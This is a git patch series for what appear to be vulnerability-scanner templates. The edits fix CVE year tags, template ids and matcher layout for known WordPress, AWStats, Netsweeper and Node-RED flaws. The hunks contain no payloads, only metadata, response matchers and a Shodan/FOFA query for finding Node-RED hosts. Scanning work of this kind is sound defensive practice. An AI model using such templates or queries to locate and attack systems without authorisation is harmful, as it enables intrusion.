- tags: wordpress,plugin
+ tags: cve,cve2020,wordpress,wp-plugin,exposure
 requests:
 - method: GET
@@ -25,16 +25,16 @@ requests:
 matchers-condition: and
 matchers:
 - type: regex
+ part: body
 regex:
 - "rest_post_invalid_id"
 - "\"(guid|title|content|excerpt)\":{\"rendered\":"
 condition: or
- part: body
 - type: word
+ part: header
 words:
 - "application/json"
- part: header
 - type: status
 status:
diff --git a/cves/2021/CVE-2021-25120.yaml b/cves/2021/CVE-2021-25120.yaml
index 3eaedf7963..5b471c1c42 100644
--- a/cves/2021/CVE-2021-25120.yaml
+++ b/cves/2021/CVE-2021-25120.yaml
@@ -14,7 +14,7 @@ info:
 cvss-score: 6.1
 cve-id: CVE-2021-25120
 cwe-id: CWE-79
- tags: wordpress,wp-plugin,xss,authenticated
+ tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated
 requests:
 - raw:
diff --git a/cves/2021/CVE-2021-42071.yaml b/cves/2021/CVE-2021-42071.yaml
index bcd30e2e28..00c590c1ef 100644
--- a/cves/2021/CVE-2021-42071.yaml
+++ b/cves/2021/CVE-2021-42071.yaml
@@ -14,7 +14,7 @@ info:
 cvss-score: 9.8
 cve-id: CVE-2021-42071
 cwe-id: CWE-78
- tags: visualtools,rce,oast,injection
+ tags: cve,cve2021,visualtools,rce,oast,injection
 requests:
 - raw:
From 0180779d24b7a366f1e2f3bb0764e52579ceb0ca Mon Sep 17 00:00:00 2001
From: sandeep
Date: Mon, 27 Jun 2022 15:13:42 +0530
Subject: [PATCH 20/21] template id and tags fixes
---
 cves/2009/CVE-2009-5020.yaml | 2 +-
 cves/2012/CVE-2012-4547.yaml | 2 +-
 cves/2014/CVE-2014-9614.yaml | 2 +-
 cves/2016/CVE-2016-10924.yaml | 2 +-
 cves/2020/CVE-2020-11529.yaml | 2 +-
 cves/2021/CVE-2021-24358.yaml | 4 ++--
 cves/2021/CVE-2021-25033.yaml | 4 ++--
 cves/2021/CVE-2021-25063.yaml | 2 +-
 cves/2021/CVE-2021-3223.yaml | 2 +-
 9 files changed, 11 insertions(+), 11 deletions(-)
diff --git a/cves/2009/CVE-2009-5020.yaml b/cves/2009/CVE-2009-5020.yaml
index c4f1e581a5..6e9cbc2706 100644
--- a/cves/2009/CVE-2009-5020.yaml
+++ b/cves/2009/CVE-2009-5020.yaml
@@ -14,7 +14,7 @@ info:
 cvss-score: 6.1
 cve-id: CVE-2009-5020
 cwe-id: CWE-601
- tags: cve,cve2020,redirect,awstats
+ tags: cve,cve2009,redirect,awstats
 requests:
 - method: GET
diff --git a/cves/2012/CVE-2012-4547.yaml b/cves/2012/CVE-2012-4547.yaml
index 4a35ca2a5e..9025770e0a 100644
--- a/cves/2012/CVE-2012-4547.yaml
+++ b/cves/2012/CVE-2012-4547.yaml
@@ -12,7 +12,7 @@ info:
 - http://openwall.com/lists/oss-security/2012/10/29/7
 classification:
 cve-id: CVE-2012-4547
- tags: cve,cve2020,xss,awstats
+ tags: cve,cve2012,xss,awstats
 requests:
 - method: GET
diff --git a/cves/2014/CVE-2014-9614.yaml b/cves/2014/CVE-2014-9614.yaml
index b71a33cd9c..38595c2b6b 100644
--- a/cves/2014/CVE-2014-9614.yaml
+++ b/cves/2014/CVE-2014-9614.yaml
@@ -14,7 +14,7 @@ info:
 cvss-score: 9.8
 cve-id: CVE-2014-9614
 cwe-id: CWE-798
- tags: cve,cve2021,netsweeper,default-login
+ tags: cve,cve2014,netsweeper,default-login
 requests:
 - raw:
diff --git a/cves/2016/CVE-2016-10924.yaml b/cves/2016/CVE-2016-10924.yaml
index bd985936f8..3c6f212e55 100644
--- a/cves/2016/CVE-2016-10924.yaml
+++ b/cves/2016/CVE-2016-10924.yaml
@@ -16,7 +16,7 @@ info:
 cvss-score: 7.5
 cve-id: CVE-2016-10924
 cwe-id: CWE-22
- tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook,wp
+ tags: cve,cve2016,wp-plugin,lfi,wordpress,ebook,wp
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-11529.yaml b/cves/2020/CVE-2020-11529.yaml
index 9d9059661f..c4fcacdf4f 100644
--- a/cves/2020/CVE-2020-11529.yaml
+++ b/cves/2020/CVE-2020-11529.yaml
@@ -15,7 +15,7 @@ info:
 cvss-score: 6.1
 cve-id: CVE-2020-11529
 cwe-id: CWE-601
- tags: cve,cve2019,redirect,grav,getgrav
+ tags: cve,cve2020,redirect,grav,getgrav
 requests:
 - method: GET
diff --git a/cves/2021/CVE-2021-24358.yaml b/cves/2021/CVE-2021-24358.yaml
index b14b8c85ef..883e4c1a9d 100644
--- a/cves/2021/CVE-2021-24358.yaml
+++ b/cves/2021/CVE-2021-24358.yaml
@@ -1,4 +1,4 @@
-id: elementorpage-open-redirect
+id: CVE-2021-24358
 info:
 name: Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect
@@ -14,7 +14,7 @@ info:
 cvss-score: 6.1
 cve-id: CVE-2021-24358
 cwe-id: CWE-601
- tags: wordpress,redirect,wp-plugin,elementor,wp
+ tags: cve,cve2021,wordpress,redirect,wp-plugin,elementor,wp
 requests:
 - raw:
diff --git a/cves/2021/CVE-2021-25033.yaml b/cves/2021/CVE-2021-25033.yaml
index 83c815b2b8..7d66072b8e 100644
--- a/cves/2021/CVE-2021-25033.yaml
+++ b/cves/2021/CVE-2021-25033.yaml
@@ -1,4 +1,4 @@
-id: noptin-open-redirect
+id: CVE-2021-25033
 info:
 name: Noptin < 1.6.5 - Open Redirect
@@ -14,7 +14,7 @@ info:
 cvss-score: 6.1
 cve-id: CVE-2021-25033
 cwe-id: CWE-601
- tags: wordpress,redirect,wp-plugin,noptin,wp
+ tags: cve,cve2021,wordpress,redirect,wp-plugin,noptin,wp
 requests:
 - method: GET
diff --git a/cves/2021/CVE-2021-25063.yaml b/cves/2021/CVE-2021-25063.yaml
index 48a654dc21..6647da3e17 100644
--- a/cves/2021/CVE-2021-25063.yaml
+++ b/cves/2021/CVE-2021-25063.yaml
@@ -12,7 +12,7 @@ info:
 cvss-score: 6.1
 cve-id: CVE-2021-25063
 cwe-id: CWE-79
- tags: cve,cve2021wordpress,wp-plugin,xss,contactform,authenticated
+ tags: cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated
 requests:
 - raw:
diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml
index 24c35dc1d1..a9dd6fd4d3 100644
--- a/cves/2021/CVE-2021-3223.yaml
+++ b/cves/2021/CVE-2021-3223.yaml
@@ -18,7 +18,7 @@ info:
 verified: true
 shodan-query: title:"Node-RED"
 fofa-query: title="Node-RED"
- tags: cve,cve2020,node-red-dashboard,lfi
+ tags: cve,cve2021,node-red-dashboard,lfi
 requests:
 - method: GET